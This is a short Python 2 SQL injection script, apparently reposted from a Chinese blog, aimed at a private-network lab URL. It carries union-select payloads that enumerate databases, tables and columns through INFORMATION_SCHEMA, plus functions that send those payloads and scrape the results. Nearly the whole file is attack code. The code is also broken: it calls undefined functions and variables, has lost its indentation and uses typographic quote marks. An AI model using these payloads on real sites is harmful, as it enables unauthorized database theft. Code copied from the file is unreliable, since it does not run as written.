//sqliIsSoEasy.py
import requests
import urllib
import re
payload={}
payload_db = "1 and 1=2 union select 1,concat(0x7177657E,schema_name,0x7E717765) from INFORMATION_SCHEMA.SCHEMATA"
payload_tb = "1 union select 1,concat(0x7177657E,table_name,0x7E717765) from information_schema.tables where table_schema="+"‘"+database_name+"‘"
payload_col = "1 union select 1,concat(0x7177657E,column_name,0x7E717765) from information_schema.columns where table_name="+"‘"+table_name+"‘"
#有回显的联合查询:通过一个正则表达式判断是否有注入成功后的内容,若有则返回所需部分内容
def visitUrlByUnion(url,payload):
data = urllib.urlencode(values)
geturl = url+‘?‘+data
response = requests.get(geturl)
result=response.content
find_list=re.findall(r"qwe~(.+?)~qwe", result)
if len(find_list)>0:
return find_list
#获取数据库列表
def getDBName(url):
name_list=get(url,payload_db)
print ‘The databases:‘
for i in name_list:
print i+" ",
print "\n"
#选择数据库,获取表
def getTBName(url):
database_name=raw_input(‘please input your database:‘)
name_list=get(url,payload_tb)
print ‘The tables:‘
for i in name_list:
print i+" ",
print "\n"
#选择表,获取字段
def getCOLName(url):
table_name=raw_input(‘please input your table:‘)
name_list=get(url,payload_col)
print ‘The columns:‘
for i in name_list:
print i+" ",
#选择所有字段,获取数据
if __name__ == ‘__main__‘:
url=‘http://192.168.106.130/config/sql.php‘
getDBName(url)
getTBName(url)
getColName(url)
原文:https://www.cnblogs.com/p0pl4r/p/10323518.html